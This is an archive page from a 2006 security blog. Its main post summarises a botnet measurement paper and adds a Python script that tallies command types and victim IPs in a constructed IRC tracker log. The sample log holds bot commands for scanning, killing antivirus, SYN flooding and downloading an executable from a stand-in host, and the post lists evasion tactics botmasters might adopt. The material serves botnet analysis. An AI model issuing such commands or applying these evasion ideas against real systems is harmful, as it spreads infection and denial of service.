Monday, October 16, 2006

Observing and Analyzing Botnets

Informative and rich in visual material, the research paper "A Multifaceted Approach to Understanding the Botnet Phenomenon" presents its findings as follows:

"Throughout a period of more than three months, we used this infrastructure to track 192 unique IRC botnets of size ranging from a few hundred to several thousand infected end-hosts. Our results show that botnets represent a major contributor to unwanted Internet traffic—27% of all malicious connection attempts observed from our distributed darknet can be directly attributed to botnet-related spreading activity. Furthermore, we discovered evidence of botnet infections in 11% of the 800,000 DNS domains we examined, indicating a high diversity among botnet victims. Taken as a whole, these results not only highlight the prominence of botnets, but also provide deep insights that may facilitate further research to curtail this phenomenon."

Botnets are often treated as a new phenomenon, which they are not: the distributed computing concepts behind them have been around for decades. Some interesting graphs and observations in this research are:

- Breakdown of scan-related commands seen on tracked botnets during the measurement period
- The percentage of bots that launched the respective services (AV/FW Killer) on the victim machines
- Distribution of exploited hosts extracted from the IRC tracker logs
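The first and third of those graphs are produced by post-processing IRC tracker logs, that is, the channel traffic a sinkholed or honeypot-driven bot sees. The script below is an added example, not code from the paper or from this blog, showing how such a breakdown is derived: it classifies channel commands into families (scan-related, AV/firewall killer, DDoS, download), computes the share of scan-related commands, and extracts the exploited hosts that bots report back in-channel. The log format, the nick "master", the command names and the victim addresses are all constructed for illustration; real C&C dialects (Agobot, SDBot and their many forks) differ in detail.

```python
"""Summarise commands and victim reports seen in an IRC botnet tracker log.

Added example, not code from the paper or the blog post. The log format,
the nicknames, the command names and the IP addresses below are constructed
for illustration; real C&C dialects vary.
"""
import re
from collections import Counter

# Constructed sample of an IRC tracker log: "<date> <time> <nick> message".
SAMPLE_LOG = """\
2006-10-16 03:12:01 <master> .advscan lsass 200 5 0 -r -s
2006-10-16 03:12:04 <master> .advscan dcom135 150 5 0 -r
2006-10-16 03:12:09 <master> .killav
2006-10-16 03:12:15 <master> .ntscan 10.0.0.0/8 100
2006-10-16 03:12:40 <bot-a1f3> [lsass]: Exploiting IP: 203.0.113.5.
2006-10-16 03:12:41 <bot-9c02> [lsass]: Exploiting IP: 198.51.100.7.
2006-10-16 03:12:44 <bot-a1f3> [dcom135]: Exploiting IP: 203.0.113.9.
2006-10-16 03:13:00 <master> .ddos.syn 192.0.2.10 80 300
2006-10-16 03:13:30 <master> .killfw
2006-10-16 03:14:02 <master> .download http://example.invalid/u.exe c:\\u.exe 1
2006-10-16 03:15:00 <master> .scan.stop
"""

LINE_RE = re.compile(r"^(?P<ts>\S+ \S+) <(?P<nick>[^>]+)> (?P<msg>.*)$")
# Bots announcing a victim in-channel, e.g. "[lsass]: Exploiting IP: 1.2.3.4."
EXPLOIT_RE = re.compile(
    r"^\[(?P<module>[^\]]+)\]: Exploiting IP: (?P<ip>\d+(?:\.\d+){3})\.?$")

# Command families; first match wins. Command names are assumed, see docstring.
FAMILIES = [
    ("scan",       re.compile(r"^\.(advscan|ntscan|scan)(\.|\s|$)")),
    ("av_fw_kill", re.compile(r"^\.kill(av|fw)(\s|$)")),
    ("ddos",       re.compile(r"^\.ddos(\.|\s|$)")),
    ("download",   re.compile(r"^\.(download|update)(\s|$)")),
]


def classify(msg):
    """Return the command family of a channel message, 'other' for an
    unrecognised command and None for lines that are not commands at all."""
    if not msg.startswith("."):
        return None
    for name, pat in FAMILIES:
        if pat.match(msg):
            return name
    return "other"


def parse(log_text):
    """Yield (timestamp, nick, message) for well-formed lines; skip the rest."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.group("ts"), m.group("nick"), m.group("msg")


def command_breakdown(log_text):
    """Count commands per family and return {family: count}."""
    counts = Counter()
    for _, _, msg in parse(log_text):
        fam = classify(msg)
        if fam is not None:
            counts[fam] += 1
    return dict(counts)


def scan_share(log_text):
    """Fraction of all commands that are scan-related, rounded to 3 places."""
    counts = command_breakdown(log_text)
    total = sum(counts.values())
    return round(counts.get("scan", 0) / total, 3) if total else 0.0


def exploited_hosts(log_text):
    """Map exploit module -> set of victim IPs reported by bots in-channel.
    Messages from the controller nick are ignored so that a botmaster
    echoing a report cannot inflate the count."""
    hosts = {}
    for _, nick, msg in parse(log_text):
        m = EXPLOIT_RE.match(msg)
        if m and nick != "master":
            hosts.setdefault(m.group("module"), set()).add(m.group("ip"))
    return hosts


if __name__ == "__main__":
    print(command_breakdown(SAMPLE_LOG))
    print("scan share:", scan_share(SAMPLE_LOG))
    for module, ips in exploited_hosts(SAMPLE_LOG).items():
        print(module, sorted(ips))
```

On the constructed log this yields four scan commands out of eight (a scan share of 0.5), two AV/firewall-killer commands, and two distinct victims for the lsass module plus one for dcom135. The family table is where the real work happens in practice: every bot family names its scan and kill commands differently, so the regular expressions have to be extended per tracked botnet before the percentages mean anything.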

What botnet masters will definitely optimise:
- disinformation about the number and geolocation of infected hosts
- alternative and covert communication channels instead of stripped-down or encrypted IRC sessions
- a rethink of performance vs. stealthiness
- rethinking how to retain the infected nodes, rather than putting more effort into infecting new ones
- for true competitiveness, exploiting vulnerabilities in anti-virus solutions that allow the code to remain undetected for as long as possible
- synchronisation with results from popular test beds such as VirusTotal, so that an undetected payload can be reintroduced immediately

The future of malware is a solid and diverse ecosystem in which researchers, the Pentagon and malware authors are all actively benchmarking and optimising malware, each with separate objectives to achieve.

Go through a previous post, "Malware Bot Families, Technology and Trends", if you want to find out more about botnet technologies, and update yourself with the most recent case of DDoS extortion.

Sunday, October 15, 2006

North Korea's Wake-up Call

"Hey Dick, do you know what time it is? It's Time to Bomb Kim Jong!"

Saturday, October 14, 2006

Hunting the Hacker - Documentary

Here's a recently released documentary -- in Russian -- entitled "Охота на хакера", or Hunting the Hacker, discussing IT security, cyber crime, malware authors, online scams etc. It also features Eugene Kaspersky commenting on various trends. Don't forget, Russian and Eastern European hackers are not just responsible for the sky-rocketing cyber-crime cost "projections", but for the global warming effect as well. I often come across biased comments on wrongly structured research questions such as "Who are the best hackers in respect to nationalities?", where the question should have been formulated as "How vibrant is the IT security landscape, so that the changing dominance lifecycle of a nation could be measured at a particular moment in time?"

True hackers don't have nationalities, they're citizens of the world. Download or stream it from Google Video.

Thursday, October 12, 2006

The Return on Investment of Blogging

What's the return on investment (ROI) of blogging? Blogging for dollars is already happening, whereas this great post by Charlene Li emphasises many more qualitative benefits, and ways of measuring their progress or their slowdown:

"My colleague, Chloe Stromberg, and I have been interviewing companies about how they measure ROI and realized that we needed to throw the net wider – this is where you come in! The working idea is to create a framework for measuring the ROI of external blogging efforts for medium- and large-sized companies. Below is an outline of ingredients for the framework. Please help us by fleshing out sources, providing examples, and adding/editing our ROI factors – feel free to add comments to this post or to email us directly (if you’d prefer, we’ll keep specific numbers and examples confidential and use them only as background)."

What's my initial investment? It's time, and time doesn't really mean money, it means opportunities.

My ROI factors :
- visitors' retention
- blog stickiness
- average time spent
- echo-effect
- improved networking, communication with colleagues, friends, and of course, hordes of hypocrites
- successfully reaching, retaining, and informing predefined audiences
- a differentiated content channel, not merely link posting
- third-party syndication
- self-preservation and self-awakening
- setting the foundation for my successful identity upload and immortality into cyberspace?

Cloud courtesy of the main blog index and density of the keywords.